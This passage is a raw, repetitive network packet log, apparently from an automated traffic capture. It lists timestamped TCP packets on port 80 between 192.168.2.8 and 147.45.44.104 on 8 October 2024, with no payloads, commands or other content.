                                                                              Oct 8, 2024 03:23:05.748591900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748603106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748605013 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748620987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748634100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748790979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748801947 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748820066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748826027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748836040 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748851061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748859882 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748867035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748881102 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748878956 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748900890 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748909950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.748929024 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.748951912 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.785146952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785159111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785177946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785190105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785214901 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785214901 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.785224915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785235882 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.785262108 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.785264015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785274982 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.785341978 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.809190035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809211969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809222937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809251070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.809293032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809304953 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809324026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809334993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.809335947 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.809367895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.812514067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812524080 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812541962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812563896 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.812576056 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812577963 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.812587976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812607050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812619925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.812639952 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.812664032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817478895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817509890 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817529917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817539930 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817549944 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817557096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817572117 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817668915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817678928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817696095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817706108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817715883 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817725897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817738056 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817742109 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817758083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817766905 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817769051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817789078 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817792892 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817823887 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817832947 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817836046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817861080 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817868948 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817872047 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817888975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817910910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817912102 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817922115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817945004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817950010 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817958117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817977905 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.817986012 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.817989111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818008900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818010092 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818038940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818041086 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818051100 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818070889 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818080902 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818084955 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818100929 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818110943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818114042 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818139076 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818159103 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818172932 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818175077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818191051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818202972 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818223000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818236113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818238974 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818257093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818269014 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818272114 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818300962 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818327904 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818330050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818331957 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818341017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818350077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818371058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818375111 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818382978 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818401098 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818402052 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818414927 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818416119 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818434000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.818442106 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.818473101 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.819408894 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819430113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819437981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819473982 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.819494963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819505930 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819516897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819531918 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.819533110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819547892 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.819556952 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.819581032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.820841074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820925951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820935011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820951939 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820962906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820971012 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.820982933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.820997000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.821008921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.821011066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.821022034 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.821049929 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.822818041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822829008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822849035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822864056 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.822901964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822925091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822926998 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822937965 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.822947979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822961092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.822978973 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.822995901 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835076094 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835117102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835130930 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835150957 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835165977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835176945 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835196018 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835201025 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835237980 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835302114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835314035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835330963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835340977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835347891 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835361004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835371971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835372925 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835401058 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835408926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835421085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835438013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835448027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835449934 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835473061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835475922 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835484028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835504055 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835513115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835525036 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.835530996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.835540056 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.872044086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872070074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872081041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.872081995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872127056 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.872165918 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872176886 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872193098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872203112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.872209072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.872245073 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.895715952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895745993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895787001 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.895818949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895829916 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895848036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895868063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895869970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.895881891 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895900965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.895910978 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.895941973 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.899300098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899311066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899331093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899349928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899355888 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.899363041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899374962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899394989 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899399996 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.899399996 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.899403095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.899444103 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905020952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905036926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905050993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905071020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905072927 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905082941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905108929 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905112028 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905121088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905215979 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905215979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905227900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905251026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905253887 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905262947 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905280113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905298948 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905311108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905318022 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905322075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905373096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905383110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905395985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905399084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905411959 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905452013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905463934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905481100 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905487061 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905494928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905509949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905513048 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905541897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905544043 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905551910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905580997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905591011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905605078 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905616999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905630112 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905684948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905694962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905713081 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905719995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905745029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905755997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905769110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905771971 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905791044 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905900002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905910015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905931950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905937910 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905950069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905961990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905972958 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905981064 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905991077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905992985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906016111 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906043053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906053066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906075954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906090975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906094074 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906105042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906121969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906126976 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906132936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906152010 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906157017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906163931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906182051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906183004 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906218052 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906219006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906230927 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906261921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906276941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906286001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906305075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906326056 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906369925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906383991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906393051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906408072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906413078 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906424999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906429052 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906456947 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907815933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907845974 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907855034 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907883883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907893896 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907898903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907923937 CEST4970680192.168.2.8147.45.44.104
